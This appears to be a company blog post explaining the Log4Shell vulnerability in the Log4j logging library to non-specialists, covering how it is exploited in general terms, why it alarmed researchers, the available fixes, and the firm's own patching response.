The Vulnerability That Has The Security Community in Meltdown: Log4Shell explained
Introduction
Log4Shell, or Logjam, is the name security researchers have given the newly disclosed vulnerability that threw security experts into crisis mode in early December. The name comes from the software package which has the vulnerability, which is called Log4j and is a part of the very common programming framework, Java.
In short, it is an extremely easy-to-exploit vulnerability that affects millions, if not billions, of devices, systems and programs worldwide, making it a very serious concern in the world of cybersecurity.
What is it?
The vulnerability exists within a standard way for systems to record information about what they are processing, known as logging. A computer may log information entered by users, such as usernames or clicks, or system data, such as error messages and error times. These logs can then be used later to troubleshoot issues, or better understand how the computer is working.
The Log4Shell vulnerability exists because when a specific, malicious combination of text is logged, the logging computer sees the text as a command to be executed rather than information to be entered into the log. The malicious command tells the computer to connect to a separate, external computer and download a program. If the attacker has written the text correctly, this second computer will be one they control, and the program it downloads will be anything the attacker chooses, likely something malicious.
For example, an attacker could pretend to “log in” to Facebook. Instead of a username, they insert a command they have written that exploits this vulnerability. The login fails, of course, but in the background, Facebook logs the failed attempt along with the “username”. The Facebook server sees the username as a command, connects to the external computer where the attacker has left a virus, and suddenly a virus has entered Facebook’s network1.
The issue was first discovered in the game Minecraft, where users were able to enter the malicious command in the chat. This would cause the game’s servers to connect to an external computer and download a program which crashed the game for everybody connected. This has since evolved and has now been observed installing ransomware on Minecraft servers.
In another example, one security researcher found Apple’s network to be vulnerable, and was able to prove how easy it was to exploit by simply renaming his iPhone with the malicious text. Once the iPhone was backed up by Apple overnight, the backup servers processed the iPhone name, recognised it as a command, and connected to the external server set up by the researcher.
Why are Researchers so Worried?
The cybersecurity industry has an unfortunate reputation of sounding doomsday alarms too early. But while Log4Shell certainly won’t signal the end of the digital world, it’s certainly a very concerning issue.
Jen Easterly, who is director of the US Cybersecurity and Infrastructure Security Agency (CISA) and is known for her level-headed approach, characterised Log4Shell as “one of the most serious I’ve seen in my entire career, if not the most serious”4 . So why is the cybersecurity community especially worried about this particular vulnerability? Here are three reasons:
Ease of use – Most serious vulnerabilities in modern software are quite hard to exploit. They often require specialist knowledge, and the chaining together of multiple security flaws before an attacker gets to run their own malicious programs in a secure environment.
Log4Shell is the complete opposite, with many security experts describing it as trivial for an attacker to exploit and gain full control of a target computer. The initial malicious text is only a few words long and is publicly available. All a would-be attacker needs to do is place their malicious program on the internet and insert the location into the text, and their target will download and run it.
Widespread exposure – The program with the vulnerability, log4j, is a common element of a very popular programming language. Programmers don’t reinvent the wheel each time they build a new program; instead, they use publicly available libraries to achieve common requirements, such as logging. Log4j was downloaded more than 80 million times in the last four months alone, and the CISA estimates the number of vulnerable devices to be in the hundreds of millions.
Threat actor activity – Due to the first two reasons, cyber threat actors have been extremely quick to take advantage of the Log4Shell vulnerability. Within hours of its public disclosure, specialist programs had been created to scan the internet, hunting for computers vulnerable to Log4Shell. Internet and security infrastructure providers are already reporting millions of attempts to use the vulnerability, and it’s estimated that more than 50% of Australian businesses have already been probed by cybercriminals looking for a way in.
In less than one week of Log4Shell being publicly disclosed, there have already been many reports of it being used to deploy Ransomware and malicious crypto miners. However, these incidents that have been detected and reported are just the tip of the iceberg. The area of most concern is the unknown number of times Log4Shell has been used to deploy more subtle, or time-bomb style malicious programs that will cause future damage or provide the attacker access at a later date.
It’s not all Doom and Gloom
Despite the concerning aspects of the Log4Shell vulnerability, there are several positive points to the situation.
The vulnerability was first discovered by the security team of Chinese technology giant Alibaba. It was privately disclosed to the developers of log4j on the 24th of November, two weeks before it went public. This gave the developers time to document a fix, as well as create a software patch, both of which are available to anyone.
In addition to the patch, there are other ways to prevent this vulnerability being exploited.
Vendors such as Cloudflare, who provide secure internet hosting infrastructure, and Check Point, who provide intrusion prevention technologies, have been able to update their solutions to identify and block attempts to exploit Log4Shell.
At time of writing these companies are reporting blocking millions of attempted exploits per day, despite not owning the computers that need patching.
This is a great demonstration of the defensive layers concept that has become popular in modern security, with vulnerable applications being protected by other security solutions until the patch can be applied.
What have Enable Done About it?
Enable Technology are deeply embedded within the cybersecurity industry and become aware of this vulnerability within hours of it being publicly disclosed. As cybersecurity experts, we have a number of tools at our disposal that allowed us to immediately commence proactive scanning of all managed clients’ networks.
The good news is that almost all our clients’ networks were found to be secure, and clean of any vulnerable systems. Where we did identify vulnerable versions of log4j, clients were notified immediately, and patches applied. In most cases exposures were the result of the game Minecraft being installed on corporate assets.
By acting quickly and proactively Enable Technology ensured that none of our clients suffered any disruption as a result of this vulnerability. The battle for protection against Log4Shell, however, is an ongoing and very real threat. As software vendors are recognising indirect vulnerabilities where they had not before, we are proactively auditing and patching managed client networks. Enable’s sophisticated toolsets can rapidly audit, identify and rectify these issues on a widescale even they keep evolving, so our clients can rest assured knowing we are keeping them secure.
Conclusion
Unfortunately, in today’s world of complex and inherited computer code, these vulnerabilities will continue to be discovered and exploited. They cannot be avoided entirely, but they can be planned for.
An IT partner with a strong security pedigree, a solid response plan, a known mapping of software and its supporting vendor, and a robust emergency patching process can be an invaluable asset to a business to help them respond to, contain, and mitigate the impact of cybersecurity issues like this on their day-to-day operations.